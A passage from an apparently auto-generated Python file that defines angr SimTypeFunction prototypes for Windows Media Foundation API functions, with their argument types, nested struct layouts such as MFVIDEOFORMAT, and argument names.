'MFCreateVideoMediaTypeFromBitMapInfoHeader': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MFVideoInterlaceMode"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pbmihBitMapInfoHeader", "dwPixelAspectRatioX", "dwPixelAspectRatioY", "InterlaceMode", "VideoFlags", "qwFramesPerSecondNumerator", "qwFramesPerSecondDenominator", "dwMaxBitRate", "ppIVideoMediaType"]),
# MFGetStrideForBitmapInfoHeader(format: UInt32, dwWidth: UInt32, pStride: Int32*) -> Int32
'MFGetStrideForBitmapInfoHeader': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["format", "dwWidth", "pStride"]),
# MFCreateVideoMediaTypeFromBitMapInfoHeaderEx(pbmihBitMapInfoHeader: BITMAPINFOHEADER*, cbBitMapInfoHeader: UInt32, dwPixelAspectRatioX: UInt32, dwPixelAspectRatioY: UInt32, InterlaceMode: MFVideoInterlaceMode, VideoFlags: UInt64, dwFramesPerSecondNumerator: UInt32, dwFramesPerSecondDenominator: UInt32, dwMaxBitRate: UInt32, ppIVideoMediaType: IMFVideoMediaType*) -> Int32
'MFCreateVideoMediaTypeFromBitMapInfoHeaderEx': SimTypeFunction([SimTypePointer(SimStruct({"biSize": SimTypeInt(signed=False, label="UInt32"), "biWidth": SimTypeInt(signed=True, label="Int32"), "biHeight": SimTypeInt(signed=True, label="Int32"), "biPlanes": SimTypeShort(signed=False, label="UInt16"), "biBitCount": SimTypeShort(signed=False, label="UInt16"), "biCompression": SimTypeInt(signed=False, label="UInt32"), "biSizeImage": SimTypeInt(signed=False, label="UInt32"), "biXPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biYPelsPerMeter": SimTypeInt(signed=True, label="Int32"), "biClrUsed": SimTypeInt(signed=False, label="UInt32"), "biClrImportant": SimTypeInt(signed=False, label="UInt32")}, name="BITMAPINFOHEADER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MFVideoInterlaceMode"), SimTypeLongLong(signed=False, label="UInt64"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFVideoMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pbmihBitMapInfoHeader", "cbBitMapInfoHeader", "dwPixelAspectRatioX", "dwPixelAspectRatioY", "InterlaceMode", "VideoFlags", "dwFramesPerSecondNumerator", "dwFramesPerSecondDenominator", "dwMaxBitRate", "ppIVideoMediaType"]),
# MFCreateMediaTypeFromRepresentation(guidRepresentation: Guid, pvRepresentation: Void*, ppIMediaType: IMFMediaType*) -> Int32
'MFCreateMediaTypeFromRepresentation': SimTypeFunction([SimTypeBottom(label="Guid"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="IMFMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidRepresentation", "pvRepresentation", "ppIMediaType"]),
# MFCreateAudioMediaType(pAudioFormat: WAVEFORMATEX*, ppIAudioMediaType: IMFAudioMediaType*) -> Int32
'MFCreateAudioMediaType': SimTypeFunction([SimTypePointer(SimStruct({"wFormatTag": SimTypeShort(signed=False, label="UInt16"), "nChannels": SimTypeShort(signed=False, label="UInt16"), "nSamplesPerSec": SimTypeInt(signed=False, label="UInt32"), "nAvgBytesPerSec": SimTypeInt(signed=False, label="UInt32"), "nBlockAlign": SimTypeShort(signed=False, label="UInt16"), "wBitsPerSample": SimTypeShort(signed=False, label="UInt16"), "cbSize": SimTypeShort(signed=False, label="UInt16")}, name="WAVEFORMATEX", pack=False, align=None), offset=0), SimTypePointer(SimTypeBottom(label="IMFAudioMediaType"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pAudioFormat", "ppIAudioMediaType"]),
# MFGetUncompressedVideoFormat(pVideoFormat: MFVIDEOFORMAT*) -> UInt32
'MFGetUncompressedVideoFormat': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), 
"value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, 
name="MFVIDEOFORMAT", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["pVideoFormat"]),
# MFInitVideoFormat(pVideoFormat: MFVIDEOFORMAT*, type: MFStandardVideoFormat) -> Int32
'MFInitVideoFormat': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": 
SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", 
pack=False, align=None), offset=0), SimTypeInt(signed=False, label="MFStandardVideoFormat")], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "type"]),
# MFInitVideoFormat_RGB(pVideoFormat: MFVIDEOFORMAT*, dwWidth: UInt32, dwHeight: UInt32, D3Dfmt: UInt32) -> Int32
'MFInitVideoFormat_RGB': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": 
SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", 
pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pVideoFormat", "dwWidth", "dwHeight", "D3Dfmt"]),
# MFConvertColorInfoToDXVA(pdwToDXVA: UInt32*, pFromFormat: MFVIDEOFORMAT*) -> Int32
'MFConvertColorInfoToDXVA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": 
SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, 
name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pdwToDXVA", "pFromFormat"]),
#
'MFConvertColorInfoFromDXVA': SimTypeFunction([SimTypePointer(SimStruct({"dwSize": SimTypeInt(signed=False, label="UInt32"), "videoInfo": SimStruct({"dwWidth": SimTypeInt(signed=False, label="UInt32"), "dwHeight": SimTypeInt(signed=False, label="UInt32"), "PixelAspectRatio": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "SourceChromaSubsampling": SimTypeInt(signed=False, label="MFVideoChromaSubsampling"), "InterlaceMode": SimTypeInt(signed=False, label="MFVideoInterlaceMode"), "TransferFunction": SimTypeInt(signed=False, label="MFVideoTransferFunction"), "ColorPrimaries": SimTypeInt(signed=False, label="MFVideoPrimaries"), "TransferMatrix": SimTypeInt(signed=False, label="MFVideoTransferMatrix"), "SourceLighting": SimTypeInt(signed=False, label="MFVideoLighting"), "FramesPerSecond": SimStruct({"Numerator": SimTypeInt(signed=False, label="UInt32"), "Denominator": SimTypeInt(signed=False, label="UInt32")}, name="MFRatio", pack=False, align=None), "NominalRange": SimTypeInt(signed=False, label="MFNominalRange"), "GeometricAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "MinimumDisplayAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": 
SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "PanScanAperture": SimStruct({"OffsetX": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "OffsetY": SimStruct({"fract": SimTypeShort(signed=False, label="UInt16"), "value": SimTypeShort(signed=True, label="Int16")}, name="MFOffset", pack=False, align=None), "Area": SimStruct({"cx": SimTypeInt(signed=True, label="Int32"), "cy": SimTypeInt(signed=True, label="Int32")}, name="SIZE", pack=False, align=None)}, name="MFVideoArea", pack=False, align=None), "VideoFlags": SimTypeLongLong(signed=False, label="UInt64")}, name="MFVideoInfo", pack=False, align=None), "guidFormat": SimTypeBottom(label="Guid"), "compressedInfo": SimStruct({"AvgBitrate": SimTypeLongLong(signed=True, label="Int64"), "AvgBitErrorRate": SimTypeLongLong(signed=True, label="Int64"), "MaxKeyFrameSpacing": SimTypeInt(signed=False, label="UInt32")}, name="MFVideoCompressedInfo", pack=False, align=None), "surfaceInfo": SimStruct({"Format": SimTypeInt(signed=False, label="UInt32"), "PaletteEntries": SimTypeInt(signed=False, label="UInt32"), "Palette": SimTypePointer(SimUnion({"ARGB": SimStruct({"rgbBlue": SimTypeChar(label="Byte"), "rgbGreen": SimTypeChar(label="Byte"), "rgbRed": SimTypeChar(label="Byte"), "rgbAlpha": SimTypeChar(label="Byte")}, name="MFARGB", pack=False, align=None), "AYCbCr": SimStruct({"bCrValue": SimTypeChar(label="Byte"), "bCbValue": SimTypeChar(label="Byte"), "bYValue": SimTypeChar(label="Byte"), "bSampleAlpha8": SimTypeChar(label="Byte")}, name="MFAYUVSample", pack=False, align=None)}, name="<anon>", label="None"), offset=0)}, name="MFVideoSurfaceInfo", pack=False, align=None)}, name="MFVIDEOFORMAT", 
pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pToFormat", "dwFromDXVA"]),
#
'MFCopyImage': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "lDestStride", "pSrc", "lSrcStride", "dwWidthInBytes", "dwLines"]),
#
'MFConvertFromFP16Array': SimTypeFunction([SimTypePointer(SimTypeFloat(size=32), label="LPArray", offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "pSrc", "dwCount"]),
#
'MFConvertToFP16Array': SimTypeFunction([SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypePointer(SimTypeFloat(size=32), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pDest", "pSrc", "dwCount"]),
#
'MFCreate2DMediaBuffer': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["dwWidth", "dwHeight", "dwFourCC", "fBottomUp", "ppBuffer"]),
#
'MFCreateMediaBufferFromMediaType': SimTypeFunction([SimTypeBottom(label="IMFMediaType"), SimTypeLongLong(signed=True, label="Int64"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="IMFMediaBuffer"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMediaType", "llDuration", "dwMinLength", "dwMinAlignment", "ppBuffer"]),
#
'MFCreateCollection': SimTypeFunction([SimTypePointer(SimTypeBottom(label="IMFCollection"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ppIMFCollection"]),
#
'MFHeapAlloc': SimTypeFunction([SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="EAllocationType")], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["nSize", "dwFlags", "pszFile", "line", "eat"]),
#
'MFHeapFree': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeBottom(label="Void"), arg_names=["pv"]),
#
'MFllMulDiv': SimTypeFunction([SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64"), SimTypeLongLong(signed=True, label="Int64")], SimTypeLongLong(signed=True, label="Int64"), arg_names=["a", "b", "c", "d"]),
#
'MFGetContentProtectionSystemCLSID': SimTypeFunction([SimTypePointer(SimTypeBottom(label="Guid"), offset=0), SimTypePointer(SimTypeBottom(label="Guid"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["guidProtectionSystemID", "pclsid"]),
#
